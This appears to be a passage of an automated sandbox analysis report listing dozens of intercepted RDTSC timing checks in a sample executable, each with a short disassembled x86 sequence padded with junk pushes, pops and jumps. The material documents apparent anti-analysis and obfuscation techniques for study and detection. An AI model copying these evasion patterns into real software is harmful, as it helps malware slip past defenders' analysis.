Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A75F23 second address: A75F79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov ecx, dword ptr [ebp+122D1BB4h] 0x0000000f mov ebx, dword ptr [ebp+12479FAEh] 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007FAAAC4EC6A8h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f movzx edx, ax 0x00000032 add eax, ebx 0x00000034 cld 0x00000035 nop 0x00000036 pushad 0x00000037 jmp 00007FAAAC4EC6B3h 0x0000003c pushad 0x0000003d jc 00007FAAAC4EC6A6h 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A75F79 second address: A75F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACBE9A second address: ACBEBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FAAAC4EC6A6h 0x0000000a pop edi 0x0000000b je 00007FAAAC4EC6BDh 0x00000011 jmp 00007FAAAC4EC6B1h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACBEBE second address: ACBED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 jmp 00007FAAAC4EBB2Ch 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACC9F6 second address: ACCA15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FAAAC4EC6B8h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACCA15 second address: ACCA1A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACFC32 second address: ACFC4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6B4h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD33F1 second address: AD33F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD33F5 second address: AD3404 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAAC4EC6ABh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADC5ED second address: ADC5F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADC5F2 second address: ADC615 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jo 00007FAAAC4EC6A6h 0x00000009 jmp 00007FAAAC4EC6ABh 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007FAAAC4EC6AAh 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b push eax 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADC615 second address: ADC642 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAAAC4EBB3Dh 0x00000008 jmp 00007FAAAC4EBB31h 0x0000000d jnl 00007FAAAC4EBB26h 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007FAAAC4EBB26h 0x0000001b jc 00007FAAAC4EBB26h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADB15B second address: ADB15F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADB15F second address: ADB184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAAAC4EBB2Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 jc 00007FAAAC4EBB26h 0x00000016 pop esi 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADBCCE second address: ADBCD8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAAAC4EC6A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADBCD8 second address: ADBCE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADBFD2 second address: ADBFE1 instructions: 0x00000000 rdtsc 0x00000002 js 00007FAAAC4EC6A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADBFE1 second address: ADBFED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FAAAC4EBB26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADC2DA second address: ADC2E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADF51F second address: ADF523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADF84A second address: ADF84E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADFB27 second address: ADFB2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADFB2C second address: ADFB36 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAAAC4EC6ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE005C second address: AE0060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE0060 second address: AE0072 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6AEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE0072 second address: AE0078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE0078 second address: AE0082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FAAAC4EC6A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AEDE00 second address: AEDE26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FAAAC4EBB2Ah 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e jmp 00007FAAAC4EBB30h 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF86C3 second address: AF86C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF86C9 second address: AF86CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF86CF second address: AF86D9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAAAC4EC6A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF86D9 second address: AF8709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jng 00007FAAAC4EBB26h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jmp 00007FAAAC4EBB39h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF8709 second address: AF870D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF870D second address: AF872A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007FAAAC4EBB2Eh 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0318E second address: B031CC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAAAC4EC6A6h 0x00000008 jmp 00007FAAAC4EC6B5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 jg 00007FAAAC4EC6A6h 0x00000016 pop ecx 0x00000017 pop edi 0x00000018 jo 00007FAAAC4EC6ECh 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FAAAC4EC6ACh 0x00000025 push edx 0x00000026 pop edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B031CC second address: B031FD instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAAAC4EBB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jbe 00007FAAAC4EBB26h 0x00000011 jmp 00007FAAAC4EBB31h 0x00000016 jmp 00007FAAAC4EBB2Dh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B07BFA second address: B07C14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FAAAC4EC6B4h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B09C0D second address: B09C31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB38h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FAAAC4EBB26h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B09C31 second address: B09C35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B097CC second address: B097D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B097D9 second address: B097DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B097DD second address: B097ED instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAAAC4EBB26h 0x00000008 jne 00007FAAAC4EBB26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B09948 second address: B09960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAC4EC6B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B17442 second address: B17453 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FAAAC4EBB2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B19284 second address: B192B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAC4EC6B5h 0x00000009 pushad 0x0000000a jmp 00007FAAAC4EC6B0h 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B192B4 second address: B192B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B22355 second address: B22366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnl 00007FAAAC4EC6A6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B22366 second address: B2236C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B224CB second address: B224D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B224D1 second address: B224E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FAAAC4EBB2Fh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B224E9 second address: B224EF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B224EF second address: B224F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B224F6 second address: B224FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B22659 second address: B2268B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jne 00007FAAAC4EBB26h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b jnl 00007FAAAC4EBB26h 0x00000011 jmp 00007FAAAC4EBB37h 0x00000016 push esi 0x00000017 pop esi 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2268B second address: B22695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FAAAC4EC6A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B22695 second address: B226A9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jl 00007FAAAC4EBB26h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B226A9 second address: B226AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B226AD second address: B226B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B226B3 second address: B226BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B226BD second address: B226C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B226C3 second address: B226C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2282C second address: B22830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B22AEB second address: B22B01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6ACh 0x00000007 jbe 00007FAAAC4EC6A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B22B01 second address: B22B18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B38651 second address: B38655 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B38655 second address: B3866F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAC4EBB30h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3866F second address: B38679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FAAAC4EC6A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B38679 second address: B3867D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3867D second address: B386A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAC4EC6B4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B35F43 second address: B35F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B35F49 second address: B35F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FAAAC4EC6A6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007FAAAC4EC6A6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B35F5C second address: B35F60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B45B58 second address: B45B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B45B60 second address: B45B64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B45892 second address: B45896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4946C second address: B49484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAC4EBB34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B614B2 second address: B614B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B614B6 second address: B614C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jbe 00007FAAAC4EBB26h 0x0000000f popad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B61A3D second address: B61A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FAAAC4EC6A6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAAAC4EC6B4h 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B61E1A second address: B61E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B61E1E second address: B61E3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6B2h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007FAAAC4EC6ACh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B61E3E second address: B61E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jc 00007FAAAC4EBB26h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B638C2 second address: B638C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B638C8 second address: B638CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B638CE second address: B638E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6B5h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B66403 second address: B6641D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 js 00007FAAAC4EBB2Ch 0x0000000f jbe 00007FAAAC4EBB26h 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B665DD second address: B665F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B665F2 second address: B665F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B666A9 second address: B66712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jno 00007FAAAC4EC6B8h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007FAAAC4EC6A8h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 sbb dl, FFFFFFC2h 0x0000002b mov dword ptr [ebp+122D2D13h], edx 0x00000031 mov edx, dword ptr [ebp+122D29A5h] 0x00000037 push 00000004h 0x00000039 mov dword ptr [ebp+122D2CBFh], esi 0x0000003f call 00007FAAAC4EC6A9h 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B66712 second address: B6672A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6672A second address: B6672F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6672F second address: B6674A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FAAAC4EBB26h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007FAAAC4EBB26h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6674A second address: B6674E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6674E second address: B66771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAAAC4EBB38h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B66771 second address: B66777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
